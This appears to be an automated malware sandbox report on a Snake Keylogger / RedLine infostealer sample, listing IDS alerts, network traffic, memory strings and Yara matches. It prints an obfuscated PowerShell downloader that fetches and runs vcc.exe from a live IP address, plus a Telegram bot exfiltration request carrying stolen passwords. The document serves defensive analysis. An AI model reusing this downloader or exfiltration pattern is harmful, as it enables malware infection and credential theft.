Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	11_2_2CC4E6C1
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	11_2_2CC4E6C8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	11_2_2CC40040
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-40h]	11_2_2CC4F7A8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then mov ecx, 000003E8h	11_2_2D5F0448
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then push 00000000h	11_2_2D5FC6B8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	11_2_2D5FC6B8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then push 00000000h	11_2_2D5FD20F

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 192.227.228.22:80 -> 192.168.2.11:49704
Source: Network traffic	Suricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 192.227.228.22:80 -> 192.168.2.11:49704
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.11:49712 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.11:49712 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 10 Mar 2025 20:36:33 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Mon, 10 Mar 2025 09:07:37 GMTETag: "18c800-62ff94db03eaf"Accept-Ranges: bytesContent-Length: 1624064Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 d4 05 00 00 f0 12 00 00 00 00 00 b8 e7 05 00 00 10 00 00 00 f0 05 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 50 19 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 13 00 a8 25 00 00 00 30 14 00 00 20 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 13 00 20 67 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 13 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 77 13 00 dc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c8 cb 05 00 00 10 00 00 00 cc 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 00 08 00 00 00 e0 05 00 00 08 00 00 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 3c 3f 0d 00 00 f0 05 00 00 40 0d 00 00 d8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 d8 36 00 00 00 30 13 00 00 00 00 00 00 18 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 a8 25 00 00 00 70 13 00 00 26 00 00 00 18 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 34 00 00 00 00 a0 13 00 00 00 00 00 00 3e 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 b0 13 00 00 02 00 00 00 3e 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 20 67 00 00 00 c0 13 00 00 68 00 00 00 40 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 00 20 05 00 00 30 14 00 00 20 05 00 00 a8 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 50 19 00 00 00 00 00 00 c8 18

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7944799152:AAGEIoBASD2qU30MwhTZbPlH5kb-mmGcJTU/sendDocument?chat_id=403948698&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd5ff1c48b73daHost: api.telegram.orgContent-Length: 1088Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1
Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.11:49704 -> 192.227.228.22:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49705 -> 158.101.44.242:80

Source: global traffic	HTTP traffic detected: GET /840/vcc.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.227.228.22Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown

HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.11:49706 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.22

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 3_2_02FA7A38 URLDownloadToFileW,

3_2_02FA7A38

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /840/vcc.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.227.228.22Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7944799152:AAGEIoBASD2qU30MwhTZbPlH5kb-mmGcJTU/sendDocument?chat_id=403948698&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd5ff1c48b73daHost: api.telegram.orgContent-Length: 1088Connection: Keep-Alive

Source: powershell.exe, 00000003.00000002.1492553926.00000000050D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://192.227.228.22/840/vcc.ex
Source: powershell.exe, 00000003.00000002.1492553926.00000000050D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://192.227.228.22/840/vcc.exe
Source: powershell.exe, 00000003.00000002.1476213571.00000000031CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.227.228.22/840/vcc.exe1
Source: powershell.exe, 00000003.00000002.1476213571.00000000031CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.227.228.22/840/vcc.exeA
Source: powershell.exe, 00000003.00000002.1522620204.000000000845F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.227.228.22/840/vcc.exePPC:
Source: daphpvwO.pif, 0000000B.00000002.3829347045.00000000293B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: daphpvwO.pif, 0000000B.00000002.3828826797.0000000028FE0000.00000004.00000020.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000002.3830040719.000000002B930000.00000004.08000000.00040000.00000000.sdmp, daphpvwO.pif, 0000000B.00000003.1474573472.0000000027510000.00000004.00000020.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000002.3829826144.000000002A3B1000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000002.3829143757.0000000029240000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: powershell.exe, 00000003.00000002.1522620204.0000000008427000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000003.00000002.1506307508.0000000005D17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.1492553926.0000000004E08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1492553926.0000000004E08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000003.00000002.1492553926.0000000004CB1000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000002.3829347045.00000000293B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.1492553926.0000000004E08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000003.00000002.1492553926.0000000004E08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.1522620204.000000000845F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: vcc.exe, 00000006.00000003.1461293441.000000007F366000.00000004.00001000.00020000.00000000.sdmp, vcc.exe, 00000006.00000002.1465421810.0000000000746000.00000004.00000020.00020000.00000000.sdmp, vcc.exe, 00000006.00000002.1502701800.0000000020F50000.00000004.00000020.00020000.00000000.sdmp, vcc.exe, 00000006.00000002.1498618356.0000000020599000.00000004.00001000.00020000.00000000.sdmp, vcc.exe, 00000006.00000003.1461563985.000000007F256000.00000004.00001000.00020000.00000000.sdmp, vcc.exe, 00000006.00000003.1461563985.000000007F210000.00000004.00001000.00020000.00000000.sdmp, vcc.exe, 00000006.00000002.1498618356.0000000020570000.00000004.00001000.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000000.1463840013.0000000000416000.00000002.00000001.01000000.0000000A.sdmp, daphpvwO.pif.6.dr	String found in binary or memory: http://www.pmail.com
Source: powershell.exe, 00000003.00000002.1492553926.0000000004CB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000003.00000002.1492553926.0000000004E08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: daphpvwO.pif, 0000000B.00000002.3829347045.00000000293F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: daphpvwO.pif, 0000000B.00000002.3828826797.0000000028FE0000.00000004.00000020.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000002.3830040719.000000002B930000.00000004.08000000.00040000.00000000.sdmp, daphpvwO.pif, 0000000B.00000003.1474573472.0000000027510000.00000004.00000020.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000002.3829826144.000000002A3B1000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000002.3829143757.0000000029240000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: powershell.exe, 00000003.00000002.1506307508.0000000005D17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.1506307508.0000000005D17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.1506307508.0000000005D17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.1492553926.0000000004E08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1511309376.000000000757C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com64/WindowsPowerShell/v1.0/odules/UEV/icrosoft.Uev.Commands.dll
Source: powershell.exe, 00000003.00000002.1506307508.0000000005D17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: daphpvwO.pif, 0000000B.00000002.3828826797.0000000028FE0000.00000004.00000020.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000002.3830040719.000000002B930000.00000004.08000000.00040000.00000000.sdmp, daphpvwO.pif, 0000000B.00000002.3829347045.00000000293E1000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000003.1474573472.0000000027510000.00000004.00000020.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000002.3829826144.000000002A3B1000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000002.3829143757.0000000029240000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:49712 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 11.2.daphpvwO.pif.2b930000.9.raw.unpack, UltraSpeed.cs

.Net Code: VKCodeToUnicode

System Summary

Detected Cobalt Strike Beacon

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNk9ZVUJaREdtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIyNy4yMjguMjIvODQwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFSVC1TbEVlcCgzKTtpblZPS2UtSXRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdmNjLmV4ZSI='+[CHaR]34+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNk9ZVUJaREdtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIyNy4yMjguMjIvODQwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFSVC1TbEVlcCgzKTtpblZPS2UtSXRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdmNjLmV4ZSI='+[CHaR]34+'))')))"			Jump to behavior

Malicious sample detected (through community Yara rule)

Source: 11.2.daphpvwO.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.daphpvwO.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.daphpvwO.pif.438038.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.daphpvwO.pif.29240ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.daphpvwO.pif.29240ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.vcc.exe.210b6e48.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.daphpvwO.pif.29020ca6.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.daphpvwO.pif.29020ca6.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.daphpvwO.pif.2a3b5570.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.daphpvwO.pif.2a3b5570.7.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.daphpvwO.pif.2a3de990.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.daphpvwO.pif.2a3de990.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.daphpvwO.pif.29021b8e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.daphpvwO.pif.29021b8e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.daphpvwO.pif.29021b8e.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.daphpvwO.pif.29021b8e.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.1.daphpvwO.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.daphpvwO.pif.29020ca6.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.daphpvwO.pif.29020ca6.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.1.daphpvwO.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.daphpvwO.pif.2a3b6458.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.daphpvwO.pif.2a3b6458.6.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.daphpvwO.pif.2a3b5570.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.daphpvwO.pif.2a3b5570.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
